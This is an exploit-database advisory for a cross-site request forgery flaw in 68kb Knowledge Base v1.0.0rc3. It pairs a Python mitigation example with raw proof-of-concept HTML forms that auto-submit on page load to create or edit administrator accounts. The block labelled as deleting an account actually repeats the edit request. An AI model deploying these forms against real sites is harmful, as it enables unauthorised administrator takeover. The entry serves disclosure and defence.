Vendor: Knowledge Base
By: Jelmer de Hen
CVSS: 4.3 (MEDIUM)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: Knowledge Base
Affected Version From: v1.0.0rc3
Affected Version To: v1.0.0rc3
Patch Exists: N/A
Related CWE: N/A
CPE: 68kb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

68kb Knowledge Base v1.0.0rc3 create administrator account CSRF

This exploit allows an attacker to create an administrator account on the 68kb Knowledge Base v1.0.0rc3 software. The attacker can craft a malicious HTML page that contains a form with hidden fields that contain the username, email, level, password, and passconf of the new account. When the victim visits the malicious page, the form is automatically submitted and the new account is created. The attacker can also use the same technique to delete or edit existing accounts.

Mitigation:

The application should validate the request origin and verify that the user is authorized to perform the requested action.
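
One way to apply the mitigation above, as an added example (not code from 68kb or from the advisory): a framework-neutral Python gate that a state-changing admin handler would call before acting. The origin `https://kb.example.test`, the `csrf_token` field name, the session layout and all function names are assumptions; the posted field set is the one used by the form on this page.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumption: the single origin the admin panel is served from (placeholder host).
TRUSTED_ORIGIN = "https://kb.example.test"


def issue_csrf_token(secret: bytes, session_id: str) -> str:
    """Session-bound token, embedded as a hidden field in every admin form."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Check Origin, falling back to Referer; reject when neither is present."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_admin_post(headers: dict, form: dict, session: dict, secret: bytes) -> bool:
    """Gate for state-changing admin requests such as users/add and users/edit."""
    if not session.get("is_admin"):        # authorization check
        return False
    if not same_origin(headers):           # request-origin validation
        return False
    expected = issue_csrf_token(secret, session["id"])
    supplied = str(form.get("csrf_token", ""))
    # Constant-time comparison of the anti-CSRF token.
    return hmac.compare_digest(expected.encode(), supplied.encode())


# Constructed sample data; FIELDS mirrors the hidden inputs shown on this page.
SECRET = b"constructed-demo-secret"
SESSION = {"id": "constructed-session-id", "is_admin": True}
FIELDS = {"username": "JohnDoe", "email": "email", "level": "1",
          "password": "password", "passconf": "password"}


def demo() -> dict:
    """Cross-site POST without a token versus the panel's own form."""
    cross_site = {"Origin": "https://other.example.test"}
    forged = allow_admin_post(cross_site, dict(FIELDS), SESSION, SECRET)
    own_form = dict(FIELDS, csrf_token=issue_csrf_token(SECRET, SESSION["id"]))
    legit = allow_admin_post({"Origin": TRUSTED_ORIGIN}, own_form, SESSION, SECRET)
    return {"forged": forged, "legitimate": legit}
```

The token check is what carries the defence when the Origin and Referer headers are stripped by a proxy; in that case this gate fails closed rather than falling back to the session cookie alone.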

Exploit-DB raw data:

Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF
Date: 2010-04-02
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip
Version: v1.0.0rc3

<html>
<body onload="document.forms['create'].submit()">
<form name="create" method="post" action="http://<server>/index.php/admin/users/add">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
</form>
</body>
</html>

Example of deleting an account:

<html>
<body onload="document.forms['edit'].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>

Example of editing:

<html>
<body onload="document.forms['edit'].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>